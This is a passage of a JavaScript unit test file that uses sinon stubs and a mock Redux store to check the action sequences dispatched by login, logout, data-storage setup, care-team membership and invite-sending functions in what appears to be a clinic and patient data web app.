_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); }); context('clinician has associated clinics', () => { beforeEach(() => { setAPIData({ invites: [], patient: { foo: 'bar' }, patients: [], }); }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with relationship containing an empty clinic object to the clinic details form', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, clinics: [ { clinic: { id: 'clinicId123' } }, ], }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [{ clinic: { id: 'clinicId123' } }] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'SELECT_CLINIC', payload: { clinicId: 'clinicId123' } }, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinic-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with relationship containing a ready-to-migrate clinic object to the clinic details form', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, clinics: [ { clinic: { id: 'clinicId123', name: 'Clinic One', canMigrate: true } }, ], }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [{ clinic: { id: 'clinicId123', name: 'Clinic One', canMigrate: true } }] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'SELECT_CLINIC', payload: { clinicId: 'clinicId123' } }, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinic-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with multiple relationships containing a non-empty clinic object to the workspaces view', () => { setAPIData({ user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true }, clinics: [ { clinic: { id: 'clinic123', name: 'Clinic One' } }, { clinic: { id: 'clinic456', name: 'Clinic Two' } }, ], }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [ { clinic: { id: 'clinic123', name: 'Clinic One' } }, { clinic: { id: 'clinic456', name: 'Clinic Two' } }, ] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/workspaces'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with one clinic and no DSA or shared member accounts to the clinic workspace view', () => { setAPIData({ user: { userid: 27, roles: ['clinic'], profile: { clinic: true, patient: undefined }, emailVerified: true }, clinics: [ { clinic: { id: 'clinic123', name: 'Clinic One' } }, ], patients: [], }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [ { clinic: { id: 'clinic123', name: 'Clinic One' } }, ] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/clinic-workspace'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a single relationship containing non-empty clinic object to the workspaces view', () => { setAPIData({ user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true }, clinics: [ { clinic: { id: 'clinic123', name: 'My Clinic' } }, ], invites: [], patients: [], }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [ { clinic: { id: 'clinic123', name: 'My Clinic' } }, ] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/clinic-workspace'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); context('fetching clinic invites, associated clinics, or associated patients failures', () => { it('should trigger LOGIN_FAILURE with appropriate messaging for a failed login request due to error fetching invites', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, invitesError: {status: 400, body: 'Error!'}, invites: [], patients: [], clinics: [ { clinic: { id: 'clinic123' } }, ], }); let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES); err.status = 400; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [{ clinic: { id: 'clinic123' } }] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_FAILURE', error: err, meta: { apiError: {status: 400, body: 'Error!'}}}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}}, { type: 'LOGOUT_REQUEST', }, { meta: { WebWorker: true, origin: 'http://localhost:9876', patientId: null, worker: 'data', }, payload: { predicate: undefined, }, type: 'DATA_WORKER_REMOVE_DATA_REQUEST', }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[6].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES }); expect(actions[9].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES }); expectedActions[6].error = actions[6].error; expectedActions[9].error = actions[9].error; expect(actions).to.eql(expectedActions); }); it('should trigger LOGIN_FAILURE with appropriate messaging for a failed login request due to error fetching clinics', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, clinicsError: {status: 400, body: 'Error!'}, clinics: [], patients: [], }); let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN); err.status = 400; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 400, body: 'Error!'}}}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}}, { type: 'LOGOUT_REQUEST', }, { meta: { WebWorker: true, origin: 'http://localhost:9876', patientId: null, worker: 'data', }, payload: { predicate: undefined, }, type: 'DATA_WORKER_REMOVE_DATA_REQUEST', }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[4].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN }); expect(actions[9].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN }); expectedActions[4].error = actions[4].error; expectedActions[9].error = actions[9].error; expect(actions).to.eql(expectedActions); }); it('should trigger LOGIN_FAILURE with appropriate messaging for a failed login request due to error fetching associated patient accounts', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, patientsError: {status: 400, body: 'Error!'}, clinics: [], invites: [], patients: [], }); let err = new Error(ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS); err.status = 400; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_FAILURE', error: err, meta: { apiError: {status: 400, body: 'Error!'}}}, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}}, { type: 'LOGOUT_REQUEST', }, { meta: { WebWorker: true, origin: 'http://localhost:9876', patientId: null, worker: 'data', }, payload: { predicate: undefined, }, type: 'DATA_WORKER_REMOVE_DATA_REQUEST', }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[8].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS }); expect(actions[9].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS }); expectedActions[8].error = actions[8].error; expectedActions[9].error = actions[9].error; expect(actions).to.eql(expectedActions); }); }); }); it('[400] should trigger LOGIN_FAILURE and it should call login once and user.get zero times for a failed login request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27 }; let api = { user: { login: sinon.stub().callsArgWith(2, {status: 400, body: 'Error!'}), get: sinon.stub() }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let err = new Error(ErrorMessages.ERR_LOGIN); err.status = 400; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}} ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_LOGIN }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.login.callCount).to.equal(1); expect(api.user.get.callCount).to.equal(0); }); it('[401] should trigger LOGIN_FAILURE and it should call login once and user.get zero times for a failed login because of wrong password request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27 }; let api = { user: { login: sinon.stub().callsArgWith(2, {status: 401, body: 'Wrong password!'}), get: sinon.stub(), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let err = new Error(ErrorMessages.ERR_LOGIN_CREDS); err.status = 401; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 401, body: 'Wrong password!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_LOGIN_CREDS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.login.callCount).to.equal(1); expect(api.user.get.callCount).to.equal(0); }); it('[403] should trigger LOGIN_FAILURE and it should call login once and user.get zero times for a failed login because of unverified e-mail', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27 }; let api = { user: { login: sinon.stub().callsArgWith(2, {status: 403, body: 'E-mail not verified!'}), get: sinon.stub(), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let err = null; let payload = {isLoggedIn: false, emailVerificationSent: false}; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'LOGIN_FAILURE', error: err, payload: payload, meta: { apiError: {status: 403, body: 'E-mail not verified!'}} }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/email-verification' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.login.callCount).to.equal(1); expect(api.user.get.callCount).to.equal(0); }); it('[500 on user fetch] should trigger LOGIN_FAILURE and it should call login and user.get once for a failed user.get request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27 }; let api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}), logout: sinon.stub(), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_USER); err.status = 500; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'LOGOUT_REQUEST', }, { meta: { WebWorker: true, origin: 'http://localhost:9876', patientId: null, worker: 'data', }, payload: { predicate: undefined, }, type: 'DATA_WORKER_REMOVE_DATA_REQUEST', }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_USER }); expectedActions[2].error = actions[2].error; expect(actions[3].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_USER }); expectedActions[3].error = actions[3].error; expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.login.callCount).to.equal(1); expect(api.user.get.callCount).to.equal(1); }); it('[500 on patient fetch] should trigger LOGIN_FAILURE and it should call login, user.get, and patient.get once for a failed patient.get request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27, profile: { patient: true}, emailVerified: true }; let api = { patient: { get: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}), }, user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT); err.status = 500; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user }}, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_FAILURE', error: err, payload: { link: null }, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'LOGOUT_REQUEST', }, { meta: { WebWorker: true, origin: 'http://localhost:9876', patientId: null, worker: 'data', }, payload: { predicate: undefined, }, type: 'DATA_WORKER_REMOVE_DATA_REQUEST', }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[4].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT }); expectedActions[4].error = actions[4].error; expect(actions[5].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT }); expectedActions[5].error = actions[5].error; expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.login.callCount).to.equal(1); expect(api.user.get.callCount).to.equal(1); expect(api.patient.get.callCount).to.equal(1); }); }); describe('logout', () => { it('should trigger LOGOUT_SUCCESS and it should call logout once for a successful request', () => { let api = { user: { logout: sinon.stub().callsArgWith(0, null) } }; let expectedActions = [ { type: 'LOGOUT_REQUEST' }, { type: 'DATA_WORKER_REMOVE_DATA_REQUEST', meta: { WebWorker: true, worker: 'data', origin: 'originStub', patientId: 'abc123' }, payload: { predicate: undefined } }, { type: 'LOGOUT_SUCCESS' }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: { ...initialState, currentPatientInViewId: 'abc123' } }); store.dispatch(async.logout(api)); const actions = store.getActions(); actions[1].meta.origin = 'originStub'; expect(actions).to.eql(expectedActions); expect(api.user.logout.callCount).to.equal(1); expect(trackMetric.calledWith('Logged Out')).to.be.true; }); }); describe('setupDataStorage', () => { it('should trigger SETUP_DATA_STORAGE_SUCCESS and it should call setupDataStorage once for a successful request', () => { let loggedInUserId = 500; let patient = { userid: 27, name: 'Bruce' }; let api = { patient: { post: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'SETUP_DATA_STORAGE_REQUEST' }, { type: 'SETUP_DATA_STORAGE_SUCCESS', payload: { userId: loggedInUserId, patient: patient } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients/27/data' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.setupDataStorage(api, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.patient.post.calledWith(patient)).to.be.true; expect(api.patient.post.callCount).to.equal(1); expect(trackMetric.calledWith('Created Profile')).to.be.true; }); it('should trigger SETUP_DATA_STORAGE_FAILURE and it should call setupDataStorage once for a failed request', () => { let loggedInUserId = 500; let patient = { id: 27, name: 'Bruce' }; let api = { patient: { post: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_DSA_SETUP); err.status = 500; let expectedActions = [ { type: 'SETUP_DATA_STORAGE_REQUEST' }, { type: 'SETUP_DATA_STORAGE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.setupDataStorage(api, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DSA_SETUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.post.calledWith(patient)).to.be.true; expect(api.patient.post.callCount).to.equal(1); }); }); describe('removeMembershipInOtherCareTeam', () => { it('should trigger REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_SUCCESS and it should call leaveGroup and patient.getAll once for a successful request', () => { let patientId = 27; let patients = [ { id: 200 }, { id: 101 } ] let api = { access: { leaveGroup: sinon.stub().callsArgWith(1, null) }, user: { getAssociatedAccounts: sinon.stub().callsArgWith(0, null, { patients }) }, }; let expectedActions = [ { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_REQUEST' }, { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_SUCCESS', payload: { removedPatientId: patientId } }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.removeMembershipInOtherCareTeam(api, patientId, callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.access.leaveGroup.calledWith(patientId)).to.be.true; expect(api.access.leaveGroup.callCount).to.equal(1) expect(api.user.getAssociatedAccounts.callCount).to.equal(1); // assert callback contains no error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null); }); it('should trigger REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_FAILURE and it should call removeMembershipInOtherCareTeam once for a failed request', () => { let patientId = 27; let error = {status: 500, body: 'Error!'}; let api = { access: { leaveGroup: sinon.stub().callsArgWith(1, error) } }; let err = new Error(ErrorMessages.ERR_REMOVING_MEMBERSHIP); err.status = 500; let expectedActions = [ { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_REQUEST' }, { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_FAILURE', error: err, meta: { apiError: error } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.removeMembershipInOtherCareTeam(api, patientId, callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REMOVING_MEMBERSHIP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.access.leaveGroup.calledWith(patientId)).to.be.true; expect(api.access.leaveGroup.callCount).to.equal(1); // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error); }); }); describe('removeMemberFromTargetCareTeam', () => { it('should trigger REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_SUCCESS and it should call api.access.removeMember and callback once for a successful request', () => { let memberId = 27; let patientId = 456; let patient = { id: 546, name: 'Frank' }; let api = { access: { removeMember: sinon.stub().callsArgWith(1, null) }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_REQUEST' }, { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_SUCCESS', payload: { removedMemberId: memberId } }, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient: patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.removeMemberFromTargetCareTeam(api, patientId, memberId, callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.access.removeMember.withArgs(memberId).callCount).to.equal(1); expect(api.patient.get.withArgs(patientId).callCount).to.equal(1); // assert callback contains no error, and the memberId sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null, memberId); }); it('should trigger REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_FAILURE and it should call api.access.removeMember and callback once with error for a failed request', () => { let memberId = 27; let patientId = 420; const error = { status: 500, body: 'Error!' }; let api = { access: { removeMember: sinon.stub().callsArgWith(1, error) } }; let err = new Error(ErrorMessages.ERR_REMOVING_MEMBER); err.status = 500; let expectedActions = [ { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_REQUEST' }, { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.removeMemberFromTargetCareTeam(api, patientId, memberId, callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REMOVING_MEMBER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.access.removeMember.calledWith(memberId)).to.be.true; // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error, memberId); }); }); describe('sendInvite', () => { it('should trigger SEND_INVITE_SUCCESS and it should call api.invitation.send and callback once for a successful request', () => { let email = '<EMAIL>'; let permissions = { view: true }; let invite = { foo: 'bar' }; let api = { invitation: { send: sinon.stub().callsArgWith(2, null, invite) } }; let expectedActions = [ { type: 'SEND_INVITE_REQUEST' }, { type: 'SEND_INVITE_SUCCESS', payload: { invite: invite } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.sendInvite(api, email, permissions, callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.send.calledWith(email, permissions)).to.be.true; // assert callback contains no error, and the invite sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null, invite); }); it('should trigger FETCH_PENDING_SENT_INVITES_REQUEST once for a successful request for a data donation account', () => { let email = '<EMAIL>'; let permissions = { view: true }; let invite = { email: TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL }; let api = { invitation: { send: sinon.stub().callsArgWith(2, null, invite), getSent: sinon.stub(), } }; let expectedActions = [ { type: 'SEND_INVITE_REQUEST' }, { type: 'FETCH_PENDING_SENT_INVITES_REQUEST' }, { type: 'SEND_INVITE_SUCCESS', payload: { invite: invite } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.sendInvite(api, email, permissions, callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.send.calledWith(email, permissions)).to.be.true; // assert callback contains no error, and the invite sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null, invite); }); it('should trigger SEND_INVITE_FAILURE when invite has 